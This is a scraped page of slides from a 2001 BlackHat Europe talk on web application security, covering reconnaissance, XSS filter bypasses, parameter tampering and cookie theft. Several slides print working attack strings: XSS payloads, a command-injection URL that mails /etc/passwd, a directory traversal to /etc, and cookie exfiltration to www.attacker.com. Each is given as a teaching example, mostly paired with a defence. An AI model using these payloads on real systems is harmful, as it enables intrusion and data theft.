Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
 
Rich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeRich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safe
 
Positive Technologies - S4 - Scada under x-rays
Positive Technologies - S4 - Scada under x-raysPositive Technologies - S4 - Scada under x-rays
Positive Technologies - S4 - Scada under x-rays
 
DODN2009 - Jump Start Silverlight
DODN2009 - Jump Start SilverlightDODN2009 - Jump Start Silverlight
DODN2009 - Jump Start Silverlight
 
Top Ten Web Hacking Techniques (2008)
Top Ten Web Hacking Techniques (2008)Top Ten Web Hacking Techniques (2008)
Top Ten Web Hacking Techniques (2008)
 

Bh europe-01-grossman

  • 1. Web Application Security "The Land that Information Security Forgot." BlackHat Europe 2001 Jeremiah Grossman jeremiah@whitehatsec.com WhiteHat Security www.whitehatsec.com 2001(c)WhiteHat Security, Inc.
  • 2. Topics Web Application Security Landscape Common Web Application Security Mistakes Web Application Attack Methodologies  Information & Discovery  Input Manipulation/Parameter Tampering  Authentication/Authorization  System Mis-Configurations
  • 3. What is a Web Application?  A web application or web service is a software application that is accessible using a web browser or HTTP(s) user agent. 2001(c)WhiteHat Security, Inc.
  • 5. What is Web Application Security? Simply, Web Application Security is... “The securing of web applications.” 2001(c)WhiteHat Security, Inc.
  • 8. Common Web Application Security Mistakes 2001(c)WhiteHat Security, Inc.
  • 9. Trusting Client-Side Data DO NOT TRUST CLIENT-SIDE DATA! Identify all input parameters that trust client-side data. 2001(c)WhiteHat Security, Inc.
  • 10. Unescaped Special Characters ! @ $ % ^ & * ( ) -_ + ` ~ | [ ] { } ; : ' " ? / , . > < Check for: Unescaped special characters within input strings 2001(c)WhiteHat Security, Inc.
  • 11. HTML Character Filtering Proper handling of special characters > => &gt; < => &lt; " => &quot; & => &amp; Null characters should all be removed. %00 2001(c)WhiteHat Security, Inc.
  • 12. More mistakes… Authentication mechanisms using technologies such as JavaScript or ActiveX. Lack of re-authenticating the user before issuing new passwords or performing critical tasks. Hosting of uncontrolled data on a protected domain. 2001(c)WhiteHat Security, Inc.
  • 13. Information & Discovery  Spidering/Site Crawling  Identifiable Characteristics  Errors and Response Codes  File/Application Enumeration  Network Reconnaissance 2001(c)WhiteHat Security, Inc.
  • 14. Spidering/Site Crawling  Site Map  Hidden Services  Service Map  CGI's and Forms  Documentation  Email addresses Tools: WGET http://www.gnu.org/software/wget/wget.html 2001(c)WhiteHat Security, Inc.
  • 15. Identifiable Characteristics  Comment Lines  URL Extensions  Meta Tags  Cookies  Client-Side scripting languages 2001(c)WhiteHat Security, Inc.
  • 16. Error and Response Codes HTTP Response Headers Error Messages 2001(c)WhiteHat Security, Inc.
  • 17. File/Application Enumeration Commonly referred to as “forced browsing” or “CGI Scanning”. Directory Browsing Index Listings Tools: Whisker http://www.wiretrip.net/rfp/p/doc.asp/i2/d21.htm 2001(c)WhiteHat Security, Inc.
  • 18. Network Reconnaissance WHOIS ARIN http://www.arin.net/whois/index.html Port Scan Nmap http://www.insecure.org/nmap/index.html Traceroute Ping Scan (Nmap or HPING) http://www.hping.org/ NSLookup/ Reverse DNS DNS Zone Transfer (DIG) 2001(c)WhiteHat Security, Inc.
  • 19. Input Manipulation Parameter Tampering "Twiddling Bits."  Cross-Site Scripting  Filter-Bypass Manipulation  OS Commands  Meta Characters  Path/Directory Traversal  Hidden Form Field Manipulation  HTTP Headers 2001(c)WhiteHat Security, Inc.
  • 20. Cross-Site Scripting Bad name given to a dangerous security issue Attack targets the user of the system rather than the system itself. Outside client-side languages executing within the users web environment with the same level of privilege as the hosted site. 2001(c)WhiteHat Security, Inc.
  • 21. Client-Side Scripting Languages DHTML (HTML, XHTML, HTML x.0) JavaScript (1.x) Java (Applets) VBScript Flash ActiveX XML/XSL CSS 2001(c)WhiteHat Security, Inc.
  • 22. Accessing the DOM & Outside the DOM Document Object Model (DOM) Client-Side languages possess an enormous amount of power to access and manipulate the DOM within a browser. Complex & diverse interconnections create an increased the level of access within the DOM. Increased level of access to read & modify DOM data ranging anything from background colors, to a file on your systems, and beyond to executing systems calls. 2001(c)WhiteHat Security, Inc.
  • 23. CSS Danger “The Remote Launch Pad.” Successfully CSS a user via a protected domain. Utilizing a Client-Side utility (JavaScript, ActiveX, VBScript, etc.), exploit a browser hole to download a trojan/virus. User is unknowingly infected/compromised within a single HTTP page load.
  • 24. Dangerous HTML “it’s all bad.” <APPLET> <BODY> <EMBED> <FRAME> <FRAMESET> <HTML> <IFRAME> <IMG> <LAYER> <ILAYER> <META> <OBJECT> <SCRIPT> <STYLE> ATTRIBUTE DANGER LIST (Any HTML Tag that has these attributes) STYLE SRC HREF TYPE 2001(c)WhiteHat Security, Inc.
  • 25. Filter Bypassing "JavaScript is a Cockroach" There are all kinds of input filters web applications implement to sanitize data. This section will demonstrate many known ways input filter's can be bypassed to perform malicious functions such as, cross-scripting, browser-hijacking, cookie theft, and others. Client-Side Scripting (CSS) attacks require the execution of either, JavaScript, Java, VBScript, ActiveX, Flash and some others. We will be assuming that these web applications accept HTML, at least in a limited sense. 2001(c)WhiteHat Security, Inc.
  • 26. Testing the Filters Submit all the raw HTML tags you can find, and then view the output results. Combine HTML with tag attributes, such as SRC, STYLE, HREF and OnXXX (JavaScript Event Handler). This will show what HTML is allowed, what the changes were, and possible what dangerous HTML can be exploited. 2001(c)WhiteHat Security, Inc.
  • 27. SCRIPT TAG Description: The script tag is the simplest form of inputting JavaScript Exploit: <SCRIPT>alert('JavaScript Executed');</SCRIPT> Solution: replace all "script" tags. 2001(c)WhiteHat Security, Inc.
  • 28. SRCing JavaScript Protocol Description: The JavaScript protocol will execute the expression entered after the colon. Netscape Tested. Exploit: <IMG SRC="javascript:alert('JavaScriptExecuted');"> Solution: Replace "javascript" strings in all SRC & HREF attributes in HTML tags with another string. Exp: <IMG SRC="java_script:alert('JavaScript Executed');"> will render this script useless. Further Information: Any HTML tag with a SRC attribute will execute this script on page load or on link activation. As a further protocol pattern matching, keywords "livescript" and "mocha" must be also replaced for the hold the same possibilities. *** Netscape code names *** 2001(c)WhiteHat Security, Inc.
  • 29. SRCing JavaScript Protocol w/ HTML Entities Description: As another derivative of the previous, Decimal HTML entities within these strings can cause filter bypass. Exploit: <IMG SRC="javasc&#09;ript:alert('JavaScript Executed');"> Replacement of entities 10 - 11 - 12 - 13 will also succeed. Hex instead of Decimal HTML entities will also bypass input filters and execute. <IMG SRC="javasc&#X0A;ript:alert('JavaScript Executed');"> As well as placing multiple ZERO's in front. <IMG SRC=javasc&#000010;ript:alert('JavaScript Executed');> Solution: Filter these entities within the string then do your further pattern matching 2001(c)WhiteHat Security, Inc.
  • 30. AND CURLY Description: Obscure Netscape JavaScript execution line. Exact syntax is needed to execute. Exploit: <IMG SRC="&{alert('JavaScript Executed')};"> Solution: <IMG SRC="XXalert('JavaScript Executed')};"> or something similar will nullify the problem. 2001(c)WhiteHat Security, Inc.
  • 31. Style Tag Conversion Description: Turn a style tag into a JavaScript expression. Exploit: <style TYPE="text/javascript">JS EXPRESSION</style> Solution: Replace the "javascript" string with "java_script" and all should be fine. Exploit: Import dangerous CSS. <STYLE type=text/css> @import url(http://server/very_bad.css); </STYLE> Solution: Filter and replace the "@import“ Exploit: Import a JavaScript Expression through a style tag. <style TYPE="text/css"> @import url(javascript:alert('JavaScript Executed')); IE HOLE </style> Solution: Again, filter and replace the "@import" and the "javascript:" just to be safe. 2001(c)WhiteHat Security, Inc.
  • 32. Twiddling Bits OS Commands Meta Characters Path/Directory Traversal 2001(c)WhiteHat Security, Inc.
  • 33. Power of the Semi-Colon piping input to the command line. OS Commands Normal: http://foo.com/app.cgi?email=none@foo.com Altered: http://foo.com/app.cgi?email=none@foo.com;+sendmail+/etc/passwd Shell pipes and re-directs can also be used.
  • 34. Power of the Semi-Colon piping input to the command line. Meta Characters Normal: http://foo.com/app.cgi?list=file.txt Altered: http://foo.com/app.cgi?list=*
  • 35. Power of the Semi-Colon piping input to the command line. Path Directory Traversal Normal: http://foo.com/app.cgi?directory=/path/to/data Altered: http://foo.com/app.cgi?directory=path/to/data../../../../../../etc
  • 36. More bits… Hidden Form Field Manipulation HTTP Headers 2001(c)WhiteHat Security, Inc.
  • 37. Authentication/Authorization “Hand in the cookie jar.” Cookies are restricted to domains (.acme.com) Uncontrolled data on a restricted domain can access the cookie data. JavaScript Expression: "document.cookie" window.open document.img.src Hidden Form Submit www.attacker.com/cgi-bin/cookie_thieft.pl?COOKIEDATA Cookie data is passed to a CGI through a GET request to a off domain host. 2001(c)WhiteHat Security, Inc.
  • 38. System Mis-Configurations “patches, patches, and more patches…" Vendor Patches Default Accounts Check: Web Server permission by directory browsing Software version from Discovery Known default accounts in commercial platforms BugTraq Anonymous FTP open on Web Server 2001(c)WhiteHat Security, Inc.
  • 39. Introducing OWASP Open Web Application Security Project http://www.owasp.org The "Open Web Application Security Project" or OWASP is a community effort focused on defining Recommendations, Specifications and Methodologies for Designing, Developing, Deploying and Testing the security of web enabled applications or web services. The "Open Web Application Security Project" or OWASP is based on an idea from the participants of the www- mobile-code mailing list at securityfocus.com You can join the mailing list by visiting www.securityfocus.com. 2001(c)WhiteHat Security, Inc.
  • 40. Thank You. Questions? Jeremiah Grossman · · Jeremiah@whitehatsec.com · WhiteHat Security · www.whitehatsec.com